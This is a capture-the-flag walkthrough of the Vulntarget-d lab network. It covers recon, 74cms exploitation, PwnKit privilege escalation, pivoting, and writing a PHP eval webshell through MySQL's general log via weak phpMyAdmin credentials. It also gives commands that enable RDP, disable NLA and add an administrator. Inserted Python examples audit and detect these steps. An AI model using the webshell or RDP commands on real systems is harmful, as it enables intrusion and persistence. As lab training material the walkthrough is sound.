Vulntarget-d

flag01

A quick, broad sweep with fscan.

It turned up 骑士cms (74cms).

Reproduced the exploit by following an article found online:

https://www.cnblogs.com/twlr/p/14142870.html

Then got a shell and brought the session into msf; this time I played with Viper.

Search for privilege-escalation modules:

run post/multi/recon/local_exploit_suggester

#  Name                                                        Potentially Vulnerable?  Check Result
-  ----                                                        -----------------------  ------------
1  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec         Yes                      The target is vulnerable.
2  exploit/linux/local/network_manager_vpnc_username_priv_esc  Yes                      The service is running, but could not be validated.
3  exploit/linux/local/pkexec                                  Yes                      The service is running, but could not be validated.
4  exploit/linux/local/su_login                                Yes                      The target appears to be vulnerable.
5  exploit/linux/local/sudoedit_bypass_priv_esc                Yes                      The target appears to be vulnerable. Sudo 1.8.21p2.pre.3ubuntu1.4 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

Privilege escalation to root succeeded.

flag{welcome_to_vulntarget-d}

flag02

This host turned out to be dual-homed (two NICs).

Uploaded an fscan binary and scanned the second network:

start infoscan
(icmp) Target 10.0.20.131 is alive
(icmp) Target 10.0.20.1 is alive
(icmp) Target 10.0.20.2 is alive
[*] Icmp alive hosts len is: 3
10.0.20.131:80 open
10.0.20.2:139 open
10.0.20.2:135 open
10.0.20.2:3306 open
10.0.20.2:80 open
10.0.20.131:888 open
10.0.20.1:445 open
10.0.20.1:139 open
10.0.20.131:3306 open
10.0.20.131:81 open
10.0.20.2:445 open
10.0.20.1:135 open
10.0.20.1:7680 open
10.0.20.1:7890 open
10.0.20.131:8888 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]10.0.20.1
[->]JK\7r192.168.0.1
[->]10.0.10.1
[->]192.168.33.1
[->]192.168.56.1
[->]10.0.20.1
[->]172.20.10.2
[->]240e:431:1220:9a34:a8ba:31f1:e54e:87a9
[->]240e:431:1220:9a34:b496:ba67:f381:c674
[*] WebTitle: http://10.0.20.1:7890 code:400 len:0 title:None
[*] WebTitle: http://10.0.20.131 code:200 len:1326 title:没有找到站点
[*] WebTitle: http://10.0.20.131:888 code:404 len:548 title:404 Not Found
[*] NetInfo:
[*]10.0.20.2
[->]WIN-D4S86JO2R26
[->]10.0.20.2
[*] 10.0.20.2 (Windows 7 Ultimate 7601 Service Pack 1)
[*] WebTitle: http://10.0.20.131:8888 code:302 len:219 title:Redirecting... 跳转url: http://10.0.20.131:8888/login
[*] WebTitle: http://10.0.20.131:8888/login code:200 len:802 title:安全入口校验失败
[*] WebTitle: http://10.0.20.2 code:200 len:11 title:None
[*] WebTitle: http://10.0.20.131:81 code:200 len:127212 title:骑士PHP高端人才系统(www.74cms.com)

Noticed 10.0.20.2:3306 (MySQL).

Uploaded frp to set up a SOCKS proxy.

Looking at these ports I wasn't sure what to do next, so I ran dirsearch through the proxy to look for an admin panel:

dirsearch -u http://10.0.20.2/ --proxy socks5://172.20.10.4:8989

Found phpMyAdmin.

The weak credentials root/root get into the backend.

It's running as the MySQL root account, which makes this straightforward.

-- check whether secure_file_priv restricts where the server may write files
show global variables like '%secure%';
-- turn on the general query log and point it at a file under the web root
set global general_log = on;
set global general_log_file = 'C:/phpStudy/PHPTutorial/WWW/she11.php';
-- any statement executed now is written verbatim into that file
select "<?php echo '1';@eval($_POST[cmd])?>";
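The trick above only works because secure_file_priv is empty and the general log can be redirected into the web root. As an added example (not from the original post), the following audit flags those settings from SHOW GLOBAL VARIABLES output and spots SET GLOBAL general_log_file statements aimed at a web root; the web-root list and the sample values are constructed.

```python
"""Added example, not from the original post: audit the MySQL settings that make
the general_log-to-webroot write possible, and flag SET GLOBAL statements that
redirect the log into a web root. Web roots below are a constructed inventory."""
import re
from pathlib import PurePosixPath

WEB_ROOTS = ["C:/phpStudy/PHPTutorial/WWW", "/var/www/html"]   # constructed inventory
SCRIPT_EXT = {".php", ".phtml", ".jsp", ".aspx"}

def _norm(path: str) -> str:
    return path.replace("\\", "/").lower().rstrip("/")

def _under_webroot(path: str) -> bool:
    return any(_norm(path).startswith(_norm(r) + "/") for r in WEB_ROOTS)

def _is_script(path: str) -> bool:
    return PurePosixPath(_norm(path)).suffix in SCRIPT_EXT

def audit_mysql_log_settings(variables: dict) -> list[str]:
    """Findings for a dict built from SHOW GLOBAL VARIABLES output (NULL secure_file_priv is safe)."""
    v = {k.lower(): str(val) for k, val in variables.items()}
    findings = []
    if v.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: file writes are not restricted to one directory")
    if v.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON: every statement is copied verbatim into general_log_file")
    log_file = v.get("general_log_file", "")
    if _under_webroot(log_file):
        findings.append(f"general_log_file is inside a web root: {log_file}")
    if _is_script(log_file):
        findings.append(f"general_log_file has a server-executed extension: {log_file}")
    return findings

SET_LOG_RE = re.compile(r"set\s+global\s+general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I)

def flag_log_redirects(statements: list[str]) -> list[str]:
    """Target paths of SET GLOBAL general_log_file statements aimed at a web root or script file."""
    hits = []
    for stmt in statements:
        m = SET_LOG_RE.search(stmt)
        if m and (_under_webroot(m.group(1)) or _is_script(m.group(1))):
            hits.append(m.group(1))
    return hits

if __name__ == "__main__":
    # Constructed sample mirroring the weak lab configuration used above.
    weak = {"secure_file_priv": "", "general_log": "ON",
            "general_log_file": "C:/phpStudy/PHPTutorial/WWW/she11.php"}
    for finding in audit_mysql_log_settings(weak):
        print("[!]", finding)
```

Setting secure_file_priv to a dedicated directory (or NULL) and keeping the general log outside any web root removes both conditions the walkthrough relies on.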

The resulting shell runs with very low privileges.

Used 掩日 for AV evasion and sent a reverse shell back to Viper.

#   Name                                                          Potentially Vulnerable?  Check Result
-   ----                                                          -----------------------  ------------
1   exploit/windows/local/bypassuac_dotnet_profiler               Yes                      The target appears to be vulnerable.
2   exploit/windows/local/bypassuac_eventvwr                      Yes                      The target appears to be vulnerable.
3   exploit/windows/local/bypassuac_sdclt                         Yes                      The target appears to be vulnerable.
4   exploit/windows/local/cve_2019_1458_wizardopium               Yes                      The target appears to be vulnerable.
5   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move  Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
6   exploit/windows/local/cve_2020_1054_drawiconex_lpe            Yes                      The target appears to be vulnerable.
7   exploit/windows/local/cve_2021_40449                          Yes                      The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
8   exploit/windows/local/cve_2021_40449_api                      Yes                      The target appears to be vulnerable.
9   exploit/windows/local/ms10_092_schelevator                    Yes                      The service is running, but could not be validated.
10  exploit/windows/local/ms14_058_track_popup_menu               Yes                      The target appears to be vulnerable.
11  exploit/windows/local/ms15_051_client_copy_image              Yes                      The target appears to be vulnerable.
12  exploit/windows/local/ms15_078_atmfd_bof                      Yes                      The service is running, but could not be validated.
13  exploit/windows/local/ms16_014_wmi_recv_notif                 Yes                      The target appears to be vulnerable.
14  exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes                      The service is running, but could not be validated.
15  exploit/windows/local/ms16_075_reflection                     Yes                      The target appears to be vulnerable.
16  exploit/windows/local/ms16_075_reflection_juicy               Yes                      The target appears to be vulnerable.
17  exploit/windows/local/tokenmagic                              Yes                      The target appears to be vulnerable.

Er, here simply running getsystem was enough.

# the most complete set of commands
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
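Each of those four commands leaves a distinct process-creation trace (the RDP-Tcp port key, the RDTOGGLE WMI call, the 3389 firewall rule, and UserAuthentication set to 0). As an added example (not from the original post), this classifier tags such command lines from constructed 4688-style events; the rule set and sample events are assumptions built from the commands above.

```python
"""Added example, not from the original post: classify process command lines that
enable RDP, change its port, open its firewall port or disable NLA, as the commands
above do. Events below are constructed 4688-style dicts; the rule set is assumed."""
import re

# (tag, patterns): every pattern must match (case-insensitive) for the tag to fire.
RDP_RULES = [
    ("rdp_port_set",      [r"\breg(?:\.exe)?\s+add\b", r"winstations\\rdp-tcp", r"/v\s+portnumber\b"]),
    ("rdp_enabled_reg",   [r"\breg(?:\.exe)?\s+add\b", r"terminal server", r"/v\s+fdenytsconnections\b", r"/d\s+0\b"]),
    ("rdp_enabled_wmic",  [r"\bwmic(?:\.exe)?\b", r"\brdtoggle\b", r"setallowtsconnections\s+1\b"]),
    ("rdp_firewall_open", [r"\bnetsh(?:\.exe)?\s+advfirewall\s+firewall\s+add\s+rule\b", r"localport=3389\b", r"action=allow\b"]),
    ("rdp_nla_disabled",  [r"winstations\\rdp-tcp", r"/v\s+userauthentication\b", r"/d\s+0\b"]),
]

def classify_rdp_change(cmdline: str) -> list[str]:
    """Return every rule tag whose patterns all match the command line."""
    return [tag for tag, pats in RDP_RULES
            if all(re.search(p, cmdline, re.I) for p in pats)]

def scan_events(events: list[dict]) -> list[dict]:
    """Keep only events whose CommandLine matches, annotated with the matching tags."""
    hits = []
    for ev in events:
        tags = classify_rdp_change(ev.get("CommandLine", ""))
        if tags:
            hits.append({**ev, "tags": tags})
    return hits

if __name__ == "__main__":
    # Constructed sample events reproducing the four commands from the walkthrough plus one benign query.
    sample = [
        {"EventID": 4688, "SubjectUserName": "SYSTEM", "CommandLine":
         r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f'},
        {"EventID": 4688, "SubjectUserName": "SYSTEM", "CommandLine":
         "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"},
        {"EventID": 4688, "SubjectUserName": "SYSTEM", "CommandLine":
         'netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow'},
        {"EventID": 4688, "SubjectUserName": "SYSTEM", "CommandLine":
         r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'},
        {"EventID": 4688, "SubjectUserName": "alice", "CommandLine": r"reg query HKLM\Software\Microsoft"},
    ]
    for hit in scan_events(sample):
        print(hit["SubjectUserName"], hit["tags"], hit["CommandLine"][:60])
```

A SYSTEM-context process issuing any of these within a short window of a web-server child process is the sequence this walkthrough produces and is worth an alert on its own.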

Added a new administrator user and connected over RDP.

flag{happy_new_year_vulntarget-d}

Viper is really handy; it frees up your hands!